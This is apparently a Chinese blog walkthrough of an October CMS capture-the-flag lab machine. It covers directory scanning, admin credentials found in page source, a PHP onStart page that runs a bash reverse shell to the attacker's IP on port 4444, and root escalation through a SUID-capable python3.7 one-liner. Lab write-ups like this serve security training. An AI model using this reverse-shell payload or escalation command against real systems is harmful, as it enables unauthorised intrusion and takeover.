october-cms

于 2023-02-20 12:43:15 发布
阅读量591 收藏
点赞数
分类专栏: Walkthrough系列 文章标签: php 开发语言 web bash linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/129119565
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:3e4s

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机ip。

2.探测靶机开放端口和服务情况。

漏洞探测

1.访问网页

2.用dirsearch扫描目录

dirsearch -u 192.168.1.101

3.访问目录是一个登录界面

4.查看下8080端口的源码,发现一个超链接信息

5.访问这个信息,发现用户名,密码

user - admin

password - adminadmin2

6.成功登录第三步的登录界面

漏洞利用

1.谷歌下发现这个October(十月)是一个用php语言搭建的cms

2.上传不了文件

3.虽然不能上传文件,但可以添加一个网页

4.保存之后,点击preview ; 发现报错,位置在右下角的code,这应该要php代码

5.直接谷歌 october cms code reverse shell

6.直接将查到的信息粘贴进code里 function onStart() { echo 123; }

7.再点击preview后没有报错,说明成功添加了一个网页

8.这次直接把code下面换成反弹shell的php代码,用exech函数来执行

function onStart() { echo exec('bash -c "bash -i >& /dev/tcp/192.168.1.106/4444 0>&1"'); }

权限提升

1.开启监听后,点击preview即可回弹shell

2.发现python3.7有root权限

3.直接提权,成功拿下!!!

/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
october-cms-nginix-reverse-proxy
06-07
OctoberCMS 通过 nginx 反向代理强制“https” 描述 通过 nginx 反向代理在 https 中浏览 october cms 时修复架构前缀 安装 将此插件放入您的 october cms 网站的 plugins 文件夹中
October CMS - 快速入门 2 基本概念
weixin_34356310的博客
06-16 396
项目源码地址:https://gitee.com/494901823/O... 文章视频:http://www.365yg.com/i6567357... 基本界面 October CMS 的后台管理很简单,没有多余的功能。首页部分是【仪表盘】显示了系统的基本信息。 内容管理系统:这里可以设置页面、部件、布局、内容块、资源和组件。 媒体:...
python中函数的调用_python中函数的调用
weixin_39961636的博客
11-20 447
1.python函数基础函数名: fun函数体:1~3行返回值:2调用函数:fun() ,只有见到这个括号(),程序会根据函数名从内存中找到函数体,然后执行它。2.函数的执行顺序下面的fun将上面的fun覆盖掉了,因此,在Python中代码的放置位置是有要求的,不能随意摆放,函数体要放在被调用的语句之前。3.函数的调用第一种情况:x(f),注意:x(f)中的f没有加括号(),即f为参数。将f作为参...
october cms_October CMS静态页面入门
culh2177的博客
09-02 798
october cmsThis article was created in partnership with October CMS. Thank you for supporting the partners who make SitePoint possible. Looking to partner with SitePoint? Get more information here. 本...
octobercms mysql_如何在Ubuntu 16.04 LTS上安装OctoberCMS
weixin_35990295的博客
02-19 160
如何在Ubuntu 16.04 LTS上安装OctoberCMSOctoberCMS是一个免费的,开放源码和自我托管的内容管理系统,使用PHP编写,基于Laravel框架。 OctoberCMS允许您创建自己的博客或网站,而无需任何编程语言。 它支持各种数据库,如SQLite,MySQL和PostgreSQL。OctoberCMS提供了很多的功能,其中一些列在下面:内置强大的Ajax框架。提供C...
octobercms_如何构建OctoberCMS主题
culi3118的博客
08-27 664
octobercmsOctober CMS is the new star in the sky of CMSes. Built on top of Laravel, it promises joyful coding and a back to basics approach. Read our introduction here and find out how to build plugin...
oc-s3browser-plugin:S3对象浏览器插件,带有适用于october-cms的htm组件
04-12
oc-s3浏览器插件S3对象浏览器插件,带有适用于october-cms的htm组件
October-Cms-Devworkflow:使用 Bower、Nodejs、Gulpjs 和 SASS 使用 nodejs、gulpjs、jade 和 css 预处理器开发 10 月 CMS 主题的工作流程
06-08
十月 Cms 主题 Devworkflow 使用Bower、Nodejs、Gulpjs 和 SASS使用 nodejs、gulpjs、jade 和 css 预处理器开发 10 月 CMS 主题的工作流程 随意 fork 这个 repo。 如何使用? 10 月 CMS 主题文件夹中的第一个终端...
study-octobercms
04-16
是一个内容管理框架(CMF)和Web平台,其唯一目的是使您的...'.file_get_contents('https://octobercms.com/api/installer')); " 如果计划使用数据库,请运行以下命令: php artisan october:install开发团队十月
oc-userimportexport-plugin:用户导入OctoberCMS的导出插件
05-24
OctoberCMS的用户导入/导出插件 允许导入或导出由插件管理的用户。 只需单击几下即可创建数百个帐户CSV列自动匹配,其余列可通过拖放进行匹配从“媒体”文件夹导入头像(请参阅下面的“导入头像”部分) 经过最后一...
october, 在 Laravel PHP框架上,免费开源自承载的CMS平台基于.zip
09-18
october, 在 Laravel PHP框架上,免费开源自承载的CMS平台基于 是内容管理系统和web平台,它的唯一目的是使你的开发工作流再次简单。 它是由于现有系统的挫折而产生的。 我们觉得建立网站已经成为一个复杂而混乱的过程,让开发者感到不满意。 我们想把你转到更简单的一边,回到基础。十月的任务是向世界展
crud插件_OctoberCMS CRUD-建立团队/项目管理插件
culi3182的博客
08-28 272
crud插件So far, we covered different aspects of OctoberCMS. This is a follow up article to discover how to use OctoberCMS for CRUD applications and take a detailed view at how to work with models, relat...
OctoberCms 后端用户权限的设置
chajinglong的专栏
10-31 3036
Backend Users & Permissions Registering permissions Restricting access to back-end pages Restricting access to features Registering permissions 后端用户和权限 注册权限 限制对后端页面的访问 限制对功能的访问 注册权限 Pl
October cms-Backend (后端-表单)
上食埃土,下饮黄泉
07-29 843
文章目录表单介绍配置表单行为创建page升级page预览page定义表单字段Tab optionsField optionsAvailable field typesForm widgetsForm viewsCreate viewUpdate viewPreview viewApplying conditions to fieldsInput preset converterTrigger eventsField dependenciesPreventing a field from being subm
October CMS - 快速入门 6 基本模板
weixin_33686714的博客
06-17 403
本节将编写一些css实现对页面中内容的控制。 将内容放入容器 文件:themesraiseinfolayoutsdefault.htm <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <t...
October CMS - 快速入门 1 安装
weixin_34090562的博客
06-15 301
项目源码地址:https://gitee.com/494901823/O... 视频:http://www.365yg.com/i6567340... 按照laravel开发环境的要求安装环境,必不可少的是composer了。在命令行执行composer create-project october/october octobermovi...
October CMS
jason_hou的博客
07-12 941
简介 October是一个内容管理系统(CMS),更是一个致力于让开发工作流变得简单的web平台。其诞生的原由是对现有系统的不满,我们觉得构建web站点已经变成一个非常复杂、令人费解的过程,这让开发人员很不满意,因此我们想要呈现事物的简单面,让你返璞归真
October cms-Backend (后端-列表)
上食埃土,下饮黄泉
07-30 709
Backend lists 后端列表 Introduction Configuring the list behavior Adding a toolbar Filtering the list Defining list columns Column options Available column types Displaying the list Multiple list definitions Using list filters Scope options Available s
october cms-官方文档-ajax
上食埃土,下饮黄泉
07-15 374
文章目录AJAX介绍介绍如何引入请求用法事件调用ajax调用调用方法通用方法ajax方法重定向ajax返回数据异常调用前执行代码partial更新Pulling partial updates 拉取partial更新update语法追加和前置内容Pushing partial updates 推送partial更新传递变量给partial AJAX 介绍 介绍 October包含一个整体ajax解决方案,可以让你无刷新加载数据 这个库同样可以用在主题和后端页面的任何地方 AJAX框架有两种写法 你可以使用
msdn library october 2001
最新发布
10-27
MSDN Library October 2001是微软公司于2001年10月发布的一份文档库。这个库涵盖了微软软件开发平台的各种文档,包括操作系统、编程语言开发工具以及其他技术文档。 MSDN Library October 2001为开发人员提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值